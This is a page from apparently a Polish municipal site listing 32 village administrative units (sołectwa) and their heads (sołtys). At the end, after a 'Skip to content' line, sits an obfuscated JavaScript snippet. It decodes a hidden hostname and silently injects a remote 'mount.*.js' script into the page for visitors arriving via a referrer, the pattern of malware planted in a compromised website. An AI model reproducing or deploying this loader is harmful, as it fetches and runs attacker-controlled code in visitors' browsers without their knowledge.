Sołectwa

L.P. Miejscowość Sołtys
1 Chojane – Bąki Faszczewski Wiesław
2 Chojane – Gorczany Choiński Tomasz
3 Chojane – Pawłowięta
4 Chojane – Piecki Bagiński Henryk
5 Chojane – Sierocięta Bagińska Elżbieta
6 Chojane – Stankowięta Choińska Dorota
7 Czarnowo- Biki Czarnowski Tadeusz
8 Faszcze Roszkowski Kazimierz
9 Gołasze – Dąb Werpachowski Tomasz
10 Gołasze Mościckie Leśniewski Stanisław
11 Grodzkie Szczepanowięta
12 Kalinowo – Solki Kalinowski Wojciech
13 Kulesze Kościelne Nacewicz Janina
14 Kulesze – Litewka Wnorowska Halina
15 Kulesze – Podawce Kulesza Janusz
16 Kulesze Podlipne Wójciak Andrzej
17 Leśniewo – Niedźwiedź Stypułkowska Cecylia
18 Leśniewo – Niedźwiedź Brańska Danuta
19 Niziołki – Dobki Dmochowski Robert
20 Nowe Grodzkie Uszyński Zdzisław
21 Nowe Kalinowo Artur Faszczewski
22 Nowe Wykno Grodzki Marcin
23 Stara Litwa Wnorowski Dariusz
24 Stare Grodzkie Grodzki Roman
25 Stare Kalinowo Kalinowska Hanna
26 Stare Niziołki Dawid Dąbrowski
27 Stare Wykno Kalinowski Tomasz
28 Stypułki – Giemzino Wnorowski Romuald
29 Tybory Uszyńskie Mondrzejewski Józef
30 Wnory – Pażochy Ciemniewska Anna
31 Wnory – Wiechy Zajkowski Jacek
32 Wnory – Wypychy Choiński Ireneusz

 

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);